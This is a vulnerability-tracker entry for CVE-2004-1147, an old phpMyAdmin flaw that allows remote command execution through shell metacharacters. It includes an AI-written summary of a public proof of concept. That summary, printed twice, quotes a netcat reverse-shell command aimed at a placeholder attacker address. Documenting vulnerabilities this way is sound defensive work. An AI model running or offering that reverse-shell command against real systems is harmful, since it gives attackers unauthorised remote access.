CVE-2004-1147
phpMyAdmin < 2.6.1 - Remote Code Execution via Shell Metacharacters
Title source: llmExploitation Summary
EIP tracks 1 public exploit for CVE-2004-1147. PoCs published by Nicolas Gregoire.
AI-analyzed exploit summary The exploit leverages insufficient input sanitization in phpMyAdmin to execute arbitrary commands via a crafted payload. The payload includes a reverse shell command (`nc -e /bin/sh $IP 80`), indicating a remote code execution (RCE) vulnerability.
Description
phpMyAdmin 2.6.0-pl2, and other versions before 2.6.1, with external transformations enabled, allows remote attackers to execute arbitrary commands via shell metacharacters.
Exploits (1)
The exploit leverages insufficient input sanitization in phpMyAdmin to execute arbitrary commands via a crafted payload. The payload includes a reverse shell command (`nc -e /bin/sh $IP 80`), indicating a remote code execution (RCE) vulnerability.